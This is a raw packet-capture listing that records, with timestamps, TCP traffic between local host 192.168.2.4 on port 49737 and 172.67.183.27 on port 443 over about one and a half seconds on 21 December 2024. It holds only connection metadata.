                                                                                                                                            Dec 21, 2024 20:13:48.804832935 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:48.804841995 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:48.804920912 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:48.811876059 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:48.811887980 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:48.811947107 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:48.811952114 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:48.812092066 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:48.818950891 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:48.818964005 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:48.819019079 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:48.819025040 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:48.819056988 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:48.819070101 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:48.826106071 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:48.826118946 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:48.826184034 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:48.826190948 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:48.826226950 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:48.833801985 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:48.833817959 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:48.833873034 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:48.833878040 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:48.833908081 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:48.833923101 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:48.840174913 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:48.840188026 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:48.840267897 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:48.840272903 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:48.840315104 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:48.847501040 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:48.847512960 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:48.847569942 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:48.847579002 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:48.847611904 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:48.871453047 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:48.871470928 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:48.871520042 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:48.871525049 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:48.871553898 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:48.871568918 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:48.996835947 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:48.996857882 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:48.996949911 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:48.996949911 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:48.996957064 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:48.997193098 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.004343033 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.004357100 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.004506111 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.004509926 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.004618883 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.010962963 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.010979891 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.011094093 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.011099100 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.011521101 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.018548965 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.018568039 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.018753052 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.018760920 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.018846989 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.025835037 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.025855064 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.026164055 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.026170015 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.029503107 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.032324076 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.032337904 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.032416105 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.032416105 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.032422066 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.032474995 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.039792061 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.039805889 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.039880991 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.039886951 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.039937019 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.063936949 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.063954115 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.064028025 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.064028025 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.064033985 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.064090014 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.189526081 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.189543009 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.189624071 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.189624071 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.189637899 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.189865112 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.196943045 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.196954966 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.197021008 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.197026014 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.197115898 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.203561068 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.203572989 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.203635931 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.203641891 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.203713894 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.210961103 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.210973978 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.211098909 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.211102962 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.211237907 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.218319893 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.218332052 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.218471050 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.218476057 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.218589067 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.224937916 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.224952936 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.225017071 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.225023031 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.225101948 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.232460976 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.232475042 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.232860088 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.232866049 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.233910084 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.258611917 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.258625031 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.258991003 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.258999109 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.261430025 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.381515980 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.381530046 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.381622076 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.381625891 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.381680012 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.388940096 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.388952017 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.389044046 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.389050007 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.389120102 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.396311045 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.396322012 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.396425009 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.396430969 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.396509886 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.402905941 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.402919054 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.403028965 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.403033972 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.403106928 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.410446882 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.410459042 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.410573006 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.410578012 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.410651922 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.417685032 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.417696953 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.417805910 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.417809010 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.417874098 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.425204039 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.425215960 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.425301075 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.425306082 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.425388098 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.451327085 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.451343060 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.451653004 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.451663971 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.451802015 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.585308075 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.585323095 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.585427046 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.585436106 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.585546017 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.591898918 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.591913939 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.592020035 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.592025042 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.592118025 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.598984957 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.598998070 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.599083900 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.599088907 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.599236965 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.605896950 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.605911016 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.605988026 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.605988026 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.605995893 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.606050014 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.612927914 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.612953901 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.613020897 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.613020897 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.613025904 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.613171101 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.620384932 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.620398045 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.620484114 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.620490074 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.620558977 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.626959085 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.626971006 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.627129078 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.627132893 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.627185106 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.643641949 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.643656015 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.643841028 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.643847942 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.643924952 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.776261091 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.776277065 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.776459932 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.776468039 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.776515961 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.783735991 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.783747911 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.783801079 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.783803940 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.783911943 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.791013956 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.791028023 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.791136980 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.791141987 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.795375109 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.798588037 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.798602104 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.798681974 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.798681974 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.798687935 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.798806906 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.805079937 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.805093050 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.805174112 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.805180073 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.805272102 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.812448978 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.812483072 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.812604904 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.812604904 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.812617064 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.812696934 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.819926023 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.819941044 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.823293924 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.823304892 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.823744059 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.835742950 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.835756063 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.835863113 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.835867882 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.835922956 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.968800068 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.968811989 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.968871117 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.968880892 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.968924046 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.976281881 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.976295948 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.976340055 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.976344109 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.976368904 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.976381063 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.983614922 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.983628035 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.983689070 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.983692884 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.983731031 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.990170956 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.990183115 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.990242958 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.990247011 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.990288019 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.997872114 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.997884035 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.997946978 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:49.997951984 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:49.997996092 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:50.005383015 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:50.005395889 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:50.005455971 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:50.005460978 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:50.005547047 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:50.012479067 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:50.012495995 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:50.012558937 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:50.012563944 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:50.012602091 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:50.028901100 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:50.028914928 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:50.028975010 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:50.028980970 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:50.029021025 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:50.163121939 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:50.163140059 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:50.163193941 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:50.163208961 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:50.163249016 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:50.170523882 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:50.170537949 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:50.170597076 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:50.170603037 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:50.170640945 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:50.177819967 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:50.177834988 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:50.177872896 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:50.177876949 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:50.177911997 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:50.177925110 CET49737443192.168.2.4172.67.183.27
